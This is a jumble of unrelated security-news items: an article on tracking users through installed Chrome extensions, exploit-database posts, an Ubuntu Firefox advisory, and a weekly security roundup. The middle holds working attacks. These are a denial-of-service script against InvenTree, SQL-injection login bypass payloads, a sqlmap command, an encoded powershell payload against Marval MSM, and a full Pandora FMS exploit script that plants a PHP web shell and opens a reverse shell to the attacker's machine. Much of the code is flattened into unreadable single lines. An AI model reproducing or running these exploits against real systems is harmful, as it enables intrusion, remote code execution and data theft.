We look at a new project which uses several techniques to determine which Chrome extensions are being used on a device.
The post You can be tracked online using your Chrome browser extensions appeared first on Malwarebytes Labs.

Posted: June 21, 2022 by

A researcher has found a way to generate a fingerprint of your device from your installed Google Chrome extensions, and then use that fingerprint to track you online.

Fingerprinting is a way of figuring out what makes your device unique and then using that to identify you as you move around the internet. Websites you visit receive a huge amount of information when you land on their portal—it’s a lot more than “just” which web browser you use to load up someone’s site.

What extensions do you have? How does your screen resolution compare with others? If you use a specific, unusual resolution, do you run other extensions alongside it? Do other people? Which versions of those extensions are on board? Is your IP address plain and exposed, or hidden behind a VPN?

**How do sites fingerprint my device?**

You can see a typical voluntary form of fingerprinting testing here. The site checks for a variety of information related to your device (including the below), and then places a cookie on your PC for four months:

*   the User agent header
*   the Accept header
*   the Connection header
*   the Encoding header
*   the Language header
*   the Upgrade Insecure Requests header
*   the Referer header
*   the Cache-Control header
*   the BuildId of the browser
*   the list of plugins
*   the platform
*   the cookies preferences (allowed or not)
*   the Do Not Track preferences (yes, no or not communicated)
*   the timezone
*   the screen resolution and its color depth

What you often see in tests like this is a high degree of similarity between users for things like content encoding, preference for secure HTTPs requests, supported video formats, and so on.

The numbers start to flatten out for aspects of your PC like plugins, adblocker use, media devices plugged in, and lists of fonts. As you can see, it’s not just that fingerprinting can tell you what browser you use or your screen resolution at a very basic level, it’s all of the additional components too.

There’s lots of ways fingerprinting can provide a very in-depth profile of a device.

You may use one type of browser like 50% of the other people who had their system fingerprinted. However, only 5% may use a specific version of that browser. Of that 5%, only 2% have a certain extension installed. From there, only 0.3% may use a specific _version_ of this extension. And so it goes on…

Even switching your browsers around may not help much, which leads to people coming up with all sorts of workarounds.

**Running the gauntlet of web accessible resources**

The site determines installed extensions thanks to something called “web accessible resources”. As the researcher explains:

> _Web-accessible resources are files inside an extension that can be accessed by web pages or other extensions. Extensions typically use this feature to expose images or other assets that need to be loaded in web pages, but any asset included in an extension’s bundle can be made web accessible._
> 
> _By default no resources are web accessible; only pages or scripts loaded from an extension’s origin can access that extension’s resources. Extension authors can use the web\_accessible\_resources manifest property to declare which resources are exposed and to what origins._
> 
> A webpage can successfully fetch an installed extensions web accessible resource. If the fetch fails it usually means that the extension is not installed.

Visiting the checker site returns a list of potential Chrome extensions, and each entry has a True/False detection flag. In my case, it correctly reported the installed extensions on the test system and informed me what % of users _share_ those extensions.

The project creator explains that the detection does not work for Firefox as “Firefox extension IDs are unique for every browser instance”. They go on to say that the site “only detects extensions from the Chrome web store. Extensions for \[Microsoft Edge\] can be detected using the same methods but are not supported by this tool”.

**Tackling evasive behaviour**

Some extensions have ways of not showing up in this kind of fingerprinting test. Are some of the extensions on your device trying to hide? Thanks to something called “Resource timing comparison”, it may not even matter.

> _In an effort to prevent detection some extensions will generate a secret token thats required to access their web accessible resources. Any fetch operation made without the secret token will result in failure. Although its much more difficult to detect these protected extensions, it’s still possible._
> 
> _Resources of protected extensions will take longer to fetch than resources of extensions that are not installed. By comparing the timing differences you can accurately determine if the protected extensions are installed._

**Avoiding fingerprinting**

There’s numerous suggestions for this, but not all of them may be practical for you in your day to day dealings. Suggestions from the Electronic Frontier Foundation include:

*   Using a “non-rare” browser, with the caveat that aspects such as fonts and plugins can easily make you identifiable.
*   Disabling JavaScript, with the additional caveat that this may break functionality for most websites.
*   Making use of the private browsing modes included in most web browsers.

You could also use browsers with dedicated anti-fingerprinting technology running in the background. Whatever you decide, this is by no means an easy problem to address for most people.

**RELATED ARTICLES**

February 3, 2021 - Browser synchronization is a handy feature but it comes with a few risks. Here's what you should be asking yourself before you switch it on.

September 19, 2019 - The free Malwarebytes Browser Guard extension combats privacy abuse, user tracking, clickbait, unwanted advertisements, and tech support scammers while offering granular control and faster browsing.

June 10, 2019 - A weekly roundup of security news from June 3–9, including Magecart, breaches, hyperlink auditing, Bluekeep, FTC, and facial recognition.

June 6, 2019 - Hyperlink auditing is not a new way to track website users, but it could become more popular, as many browsers are taking away user options to disable it.

November 7, 2018 - Google now requires users to enable JavaScript before logging in for extra security measures. But wait, hasn't JavaScript been used in cyberattacks? We take a look at the impact of Google's decision.

You can be tracked online using your Chrome browser extensions

Denial of Service in GitHub repository inventree/inventree prior to 0.8.0.

**Description**

The InvenTree application allows for the inclusion of notes for various objects in the application. The notes functionality does not include a character limit. An attacker can submit an infinite number of characters into the notes section, which causes a denial of service and increased processor usage for the victim. The tester tested against the Stock Parts and Parts notes sections. Tester assumes that other objects in the application that have notes available would also be vulnerable, however did not test it due to consumption of local resources.

Tester was able to add in excess of one hundred million (100,000,000) characters or more with the included PoC during testing.

**Proof of Concept**

    import requests as request_handler
    
    burp0_url = "http://192.168.1.5:8000/api/part/1/"
    burp0_cookies = {"csrftoken": "L433DJ0Xtp97EpAMROtkIyLX8KZsXWUxGYHZTcUET4WXL0EtbqgZYydelin9y4G7", "sessionid": "un2jcwzkr7ofla5c3vmfwfjw7z38blj3"}
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.5:8000/part/1/", "Content-Type": "application/json", "X-CSRFToken": "L433DJ0Xtp97EpAMROtkIyLX8KZsXWUxGYHZTcUET4WXL0EtbqgZYydelin9y4G7", "X-Requested-With": "XMLHttpRequest", "Origin": "http://192.168.1.5:8000", "DNT": "1", "Connection": "close"}
    echo_time = "A"*100000000
    burp0_json={"notes": echo_time}
    request = request_handler.patch(burp0_url, headers=burp0_headers, cookies=burp0_cookies, json=burp0_json)
    print(request.text)
    print(request.status_code)
    

**Impact**

Should a user visit one of the exploited parts, the vulnerable page will not load appropriately. The victim may see their computer become unresponsive as the processor works to process the amount of data being served by the vulnerable notes section.

**Recommendation**

Apply a consistent character limit across the application where user input can be added to notes sections.

CVE-2022-2134: Lack of Character Limit in Notes Sections Leads to Denial of Service in inventree

Old Age Home Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass# Date: 12/06/2022# Exploit Author: twseptian# Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/# Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip# Version: v1.0# Tested on: Kali Linux# Vulnerable codeline 9 in file "/oahms/admin/login.php"$ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'");# Steps of reproduce:1. Go to the admin login page http://localhost/oahms/admin/login.php2. sqli payload:  admin' or '1'='1';-- -3. password: password# Proof of ConceptPOST /oahms/admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 71Origin: http://localhostConnection: closeReferer: http://localhost/oahms/admin/login.phpCookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit=

Old Age Home Management System 1.0 SQL Injection

Pandora FMS version 7.0NG.742 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)# Date: 05/20/2022# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)# Vendor Homepage: https://pandorafms.com/# Software Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz# Version: v7.0NG.742# Tested on: Pandora FMS v7.0NG.742 (Ubuntu)# CVE: CVE-2020-5844# Source: https://github.com/UNICORDev/exploit-CVE-2020-5844# Description: index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.#!/usr/bin/env python3# Importstry:    import requestsexcept:    print(f"ERRORED: RUN: pip install requests")    exit()import sysimport timeimport urllib.parse# Class for colorsclass color:    red = '\033[91m'    gold = '\033[93m'    blue = '\033[36m'    green = '\033[92m'    no = '\033[0m'# Print UNICORD ASCII Artdef UNICORD_ASCII():    print(rf"""{color.red}        _ __,~~~{color.gold}/{color.red}_{color.no}        {color.blue}__  ___  _______________  ___  ___{color.no}{color.red}    ,~~`( )_( )-\|       {color.blue}/ / / / |/ /  _/ ___/ __ \/ _ \/ _ \{color.no}{color.red}        |/|  `--.       {color.blue}/ /_/ /    // // /__/ /_/ / , _/ // /{color.no}{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}    """)# Print exploit help menudef help():    print(r"""UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code ExecutionUsage:  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]  python3 exploit-CVE-2020-5844.py -hOptions:  -t    Target host and port. Provide target IP address and port.  -u    Target username and password. Provide username and password to log in to Pandora FMS.  -p    Target valid PHP session ID. No username or password needed. (Optional)  -s    Reverse shell mode. Provide local IP address and port. (Optional)  -c    Custom command mode. Provide command to execute. (Optional)  -w    Web shell custom mode. Provide custom PHP file name. (Optional)  -h    Show this help menu.""")    exit()# Pretty loading wheeldef loading(spins):    def spinning_cursor():        while True:            for cursor in '|/-\\':                yield cursor    spinner = spinning_cursor()    for _ in range(spins):        sys.stdout.write(next(spinner))        sys.stdout.flush()        time.sleep(0.1)        sys.stdout.write('\b')# Run the exploitdef exploit(exploitMode, targetSess):    UNICORD_ASCII()    # Print initial variables    print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution{color.no}")    print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}")    if targetSess is not None:        print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")    elif targetUser is not None:        print(f"{color.blue}USERNAME: {color.gold}{targetUser}{color.no}")        print(f"{color.blue}PASSWORD: {color.gold}{targetPass}{color.no}")    if exploitMode == "command":        print(f"{color.blue}COMMAND: {color.gold}{command}{color.no}")    if exploitMode == "web":        print(f"{color.blue}WEBFILE: {color.gold}{webName}{color.no}")    if exploitMode == "shell":        print(f"{color.blue}LOCALIP: {color.gold}{localIP}:{localPort}{color.no}")        print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}")    print(f"{color.blue}WEBSITE: {color.gold}http://{targetIP}:{targetPort}/pandora_console{color.no}")    loading(15)    # If a PHPSESSID is not provided, grab one with valid username and password    if targetSess is None:        try:            getSession = requests.post(f"http://{targetIP}:{targetPort}/pandora_console/index.php?login=1", data={"nick": targetUser, "pass": targetPass, "login_button": "login"})            targetSess = getSession.cookies.get('PHPSESSID')            print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")            if "login_move" in getSession.text:                print(f"{color.blue}ERRORED: {color.red}Invalid credentials!{color.no}")        except:            print(f"{color.blue}ERRORED: {color.red}Could not log in to website!{color.no}")            exit()    # Set headers, parameters, and cookies for post request    headers = {    'Host': f'{targetIP}',    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',    'Accept-Language': 'en-US,en;q=0.5',    'Accept-Encoding': 'gzip, deflate',    'Content-Type': 'multipart/form-data; boundary=---------------------------308045185511758964171231871874',    'Content-Length': '1289',    'Connection': 'close',    'Referer': f'http://{targetIP}:{targetPort}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager',    'Upgrade-Insecure-Requests': '1',    'Sec-Fetch-Dest': 'document',    'Sec-Fetch-Mode': 'navigate',    'Sec-Fetch-Site': 'same-origin',    'Sec-Fetch-User': '?1'    }    params = (        ('sec', 'gsetup'),        ('sec2', 'godmode/setup/file_manager')    )    cookies = {'PHPSESSID': targetSess}    # Basic PHP web shell with 'cmd' parameter    data = f'-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="file"; filename="{webName}"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET[\'cmd\']);?>\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="umask"\r\n\r\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="decompress_sent"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="go"\r\n\r\nGo\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="real_directory"\r\n\r\n/var/www/pandora/pandora_console/images\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="directory"\r\n\r\nimages\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash"\r\n\r\n6427eed956c3b836eb0644629a183a9b\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash2"\r\n\r\n594175347dddf7a54cc03f6c6d0f04b4\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="upload_file_or_zip"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874--\r\n'    # Try to upload the PHP web shell to the server    try:        response = requests.post(f'http://{targetIP}:{targetPort}/pandora_console/index.php', headers=headers, params=params, cookies=cookies, data=data, verify=False)    except:        print(f"{color.blue}ERRORED: {color.red}Could not connect to website!{color.no}")        exit()    statusCode=response.status_code    if statusCode == 200:        print(f"{color.blue}EXPLOIT: {color.gold}Connected to website! Status Code: {statusCode}{color.no}")    else:        print(f"{color.blue}ERRORED: {color.red}Could not connect to website! Status Code: {statusCode}{color.no}")        exit()    loading(15)    print(f"{color.blue}EXPLOIT: {color.gold}Logged into Pandora FMS!{color.no}")    loading(15)    # Print web shell location if in web shell mode    if exploitMode == "web":        print(f"{color.blue}EXPLOIT: {color.gold}Web shell uploaded!{color.no}")        print(f"{color.blue}SUCCESS: {color.green}Web shell available at: http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd=whoami {color.no}\n")    # Run custom command on web shell if in command mode    if exploitMode == "command":        response = requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(command)}')        print(f"{color.blue}SUCCESS: {color.green}Command executed! Printing response below:{color.no}\n")        print(response.text)    # Run reverse shell command if in reverse shell mode    if exploitMode == "shell":        shell = f"php -r \'$sock=fsockopen(\"{localIP}\",{localPort});exec(\"/bin/sh -i <&3 >&3 2>&3\");\'"        try:            requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(shell)}',timeout=1)            print(f"{color.blue}ERRORED: {color.red}Reverse shell could not connect! Make sure you have a local listener on {color.gold}{localIP}:{localPort}{color.no}\n")        except:            print(f"{color.blue}SUCCESS: {color.green}Reverse shell executed! Check your local listener on {color.gold}{localIP}:{localPort}{color.no}\n")    exit()if __name__ == "__main__":    args = ['-h','-t','-u','-p','-s','-c','-w']    modes = {'web':'Web Shell Mode','command':'Command Shell Mode','shell':'Reverse Shell Mode'}    # Initialize starting variables    targetIP = None    targetPort = None    targetUser = None    targetPass = None    targetSess = None    command = None    localIP = None    localPort = None    webName = "unicord.php" # Default web shell file name    exploitMode = "web" # Default to web shell mode    # Print help if specified or if a target or authentication is not provided    if args[0] in sys.argv or args[1] not in sys.argv or (args[2] not in sys.argv and args[3] not in sys.argv):        help()    # Collect target IP and port from CLI    if args[1] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[1]) + 1]:                raise            targetIP = sys.argv[sys.argv.index(args[1]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[1]) + 2]:                raise            targetPort = sys.argv[sys.argv.index(args[1]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")            exit()    # Collect target username and password from  CLI    if args[2] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[2]) + 1]:                raise            targetUser = sys.argv[sys.argv.index(args[2]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[2]) + 2]:                raise            targetPass = sys.argv[sys.argv.index(args[2]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")            exit()    # Collect PHPSESSID from CLI, if specified    if args[3] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[3]) + 1]:                raise            targetSess = sys.argv[sys.argv.index(args[3]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a valid PHPSESSID! \"-p <PHPSESSID>\"{color.no}")            exit()    # Set reverse shell mode from CLI, if specified    if args[4] in sys.argv:        exploitMode = "shell"        try:            if "-" in sys.argv[sys.argv.index(args[4]) + 1]:                raise            localIP = sys.argv[sys.argv.index(args[4]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[4]) + 2]:                raise            localPort = sys.argv[sys.argv.index(args[4]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Set custom command mode from CLI, if specified    elif args[5] in sys.argv:        exploitMode = "command"        try:            if sys.argv[sys.argv.index(args[5]) + 1] in args:                raise            command = sys.argv[sys.argv.index(args[5]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a custom command! \"-c <command>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Set web shell mode from CLI, if specified    elif args[6] in sys.argv:        exploitMode = "web"        try:            if sys.argv[sys.argv.index(args[6]) + 1] in args:                raise            if ".php" not in sys.argv[sys.argv.index(args[6]) + 1]:                webName = sys.argv[sys.argv.index(args[6]) + 1] + ".php"            else:                webName = sys.argv[sys.argv.index(args[6]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a custom PHP file name! \"-c <name.php>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Run with default web shell mode if no mode is specified    else:        exploit(exploitMode,targetSess)

Pandora FMS 7.0NG.742 Remote Code Execution

Virtua Software Cobranca version 12S suffers from a remote SQL injection vulnerability.

    # Exploit Title: Virtua Software Cobranca 12S - SQLi# Shodan Query: http.favicon.hash:876876147# Date: 13/08/2021# Exploit Author: Luca Regne# Vendor Homepage: https://www.virtuasoftware.com.br/# Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe# Version: 12S# Tested on: Windows Server 2019# CVE : CVE-2021-37589------------------------------------------------------------------------## Description A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter. ## Request PoC```POST /controller/login.php?acao=autenticar HTTP/1.1Host: redacted.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 37Connection: closeCookie: origem_selecionado=; PHPSESSID=idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario```This request causes an error 500. Changing the idusuario to "'+AND+'1'%3d'1'--" the response to request was 200 status code with message of authentication error. ```POST /controller/login.php?acao=autenticar HTTP/1.1Host: redacted.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 37Connection: closeCookie: origem_selecionado=; PHPSESSID=idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario```## ExploitSave the request from burp to file ```bashpython3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent```

Virtua Software Cobranca 12S SQL Injection

Ubuntu Security Notice 5475-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, spoof the browser UI, conduct cross-site scripting attacks, bypass content security policy restrictions, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5475-1June 13, 2022firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 21.10- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Firefox could be made to crash or run programs as your login if itopened a malicious website.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation, spoof the browser UI, conduct cross-site scripting (XSS)attacks, bypass content security policy (CSP) restrictions, or executearbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 21.10:  firefox                         101.0.1+build1-0ubuntu0.21.10.1Ubuntu 20.04 LTS:  firefox                         101.0.1+build1-0ubuntu0.20.04.1Ubuntu 18.04 LTS:  firefox                         101.0.1+build1-0ubuntu0.18.04.1After a standard system update you need to restart Firefox to makeall the necessary changes.References:  https://ubuntu.com/security/notices/USN-5475-1  CVE-2022-1919, CVE-2022-31736, CVE-2022-31737, CVE-2022-31738,  CVE-2022-31740, CVE-2022-31741, CVE-2022-31742, CVE-2022-31743,  CVE-2022-31744, CVE-2022-31745, CVE-2022-31747, CVE-2022-31748Package Information:  https://launchpad.net/ubuntu/+source/firefox/101.0.1+build1-0ubuntu0.21.10.1  https://launchpad.net/ubuntu/+source/firefox/101.0.1+build1-0ubuntu0.20.04.1  https://launchpad.net/ubuntu/+source/firefox/101.0.1+build1-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5475-1

Marval MSM version 14.19.0.12476 suffers from a remote code execution vulnerability.

    # Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)# Date: 27/5/2022# Exploit Author: Momen Eldawakhly (Cyber Guy)# Vendor Homepage: https://www.marvalnorthamerica.com/# Software Link: https://www.marvalnorthamerica.com/# Version: v14.19.0.12476# Tested on: Windows# Detailed blog: https://cyber-guy.gitbook.io/cyber-guy/blogs/marval-msm-rcePOST /MSM_Test/RFP/Forms/ScriptHandler.ashx?method=ProcessScript&classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP/2Host: MSMHandler.ioCookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: application/json, text/javascript, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestContent-Length: 456Origin: https://MSMHandler.ioDnt: 1Referer: https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptMaintenance.aspx?id=3Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstype=%221%22&content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&id=%2226%22&isCi=true

Marval MSM 14.19.0.12476 Remote Code Execution

Plus: Firefox adds new privacy protections, a big Intel and AMD chip flaw, and more of the week’s top security news.

This week, WIRED revealed new details that link an Indian police force to a hacking campaign against human rights defenders and activists. Researchers at SentinelOne uncovered connections between the city of Pune’s police agency and evidence planted on the devices of activists, as part of a hacking campaign dubbed Modified Elephant. It is alleged that evidence was planted on the computers of activists Rona Wilson and Varvara Rao and then used to arrest the two men. Among other details, an unnamed security analyst at an email provider revealed to SentinelOne and WIRED that the email address and phone number of a Pune police official was set as the recovery email on hacked accounts.

Elsewhere, a new front is emerging in Russia’s war against Ukraine. In the occupied city of Kherson and other nearby regions, Russian forces are routing internet connections from Ukrainian internet service providers to Russian companies. Ukrainian officials tell WIRED the shifts are happening at a large scale and could result in people being subjected to Vladimir Putin’s surveillance and censorship machine.

Robocalls aren’t going away. There’s been progress in tackling the nuisance calls in recent years but the spammy calls are still prevalent. This week we looked into the roots of the problem and what can still be done in the fight against robocalls. We also looked at a new way for cops to collect your fingerprints. How censors in Shanghai haven’t been able to hide stories of the city’s dead during an aggressive Covid-19 lockdown. And the dwindling options facing WikiLeaks founder Julian Assange after the UK Home Office approved his extradition to the US, where he faces espionage and hacking charges.

But that's not all, folks. Each week we round up the big security and privacy news we didn't cover ourselves. Click the links for the full stories, and stay safe out there.

Viktor Muller Ferreira had a traumatic childhood. Growing up, his father and mother—who had adopted him—split up. His mother later died of pneumonia, and his aunt, who raised him, also passed away. The family didn’t have much money. At school, children bullied Ferreira for his looks and his weird accent. As a result, he didn’t have many friends.

One day when his aunt was out, a neighborhood boy came round and told Ferreira that he was the fairy tale character Grey Shadow and he was going to “devour” him. “This scared me so much that I spent the entire day in a small box out on the balcony, praying until my aunt came home.” As he grew older he worked in a garage, took an interest in journalism, and moved to Brazil to reunite with his estranged father and “restore my citizenship.”

Except, according to authorities in the Netherlands, none of that is true.

Dutch intelligence agency AVID claimed this week that “Viktor Muller Ferreira” is just a cover story and false identity for Sergey Vladimirovich Cherkasov, an alleged Russian intelligence officer belonging to the GRU military unit. AVID said it caught Cherkasov applying to be an intern at the International Criminal Court at The Hague, which is investigating potential war crimes in Russia’s wars against Ukraine and Georgia.

As well as stopping Cherkasov from obtaining the position at the ICC and sending him back to Brazil, the Dutch intelligence agency also published his long and detailed cover story. The four-page story, often known as a covert intelligence officer’s “legend,” details the background of the “Ferreira” identity. “The threat posed by this intelligence officer is deemed potentially very high,” AVID said in a statement.

Since outing “Ferreira,” more clues about his undercover life have emerged. Social media profiles belonging to “Ferreira” have been discovered by the investigative unit Bellingcat, as well as a blog and online CV. He also studied at Trinity College Dublin and Johns Hopkins University. Eugene Finkel, an associate professor at Johns Hopkins, who says he taught “Ferreira,” tweeted: “I wrote him a letter. A strong one, in fact. Yes, me. I wrote a reference letter for a GRU officer. I will never get over this fact. I hate everything about GRU, him, this story. I am so glad he was exposed.”

For years it’s been impossible to move backups of WhatsApp chats between Android and iOS, and vice versa. In August last year, WhatsApp announced it was starting to roll out the ability for people to move their data between iPhones and Android devices. Now, this week, the Meta-owned company says backups will work in the other direction too—from Android to iOS.

Processors from Intel and AMD are vulnerable to a new side-channel attack called Hertzbleed. The attack could allow the theft of cryptographic keys and data, as reported by BleepingComputer and DarkReading. Hertzbleed works by exploiting a common power-saving feature in chips—called dynamic frequency scaling (DVFS)—that could allow an attacker to steal data. Frequency changes in DVFS may be correlated with information being processed by chips, Intel says in a blog post. Despite this, neither Intel nor AMD appear to have plans to address the issue. However, the risk to end users seems low at the moment. The team of researchers who found Hertzbleed say ordinary users probably shouldn’t be worried.

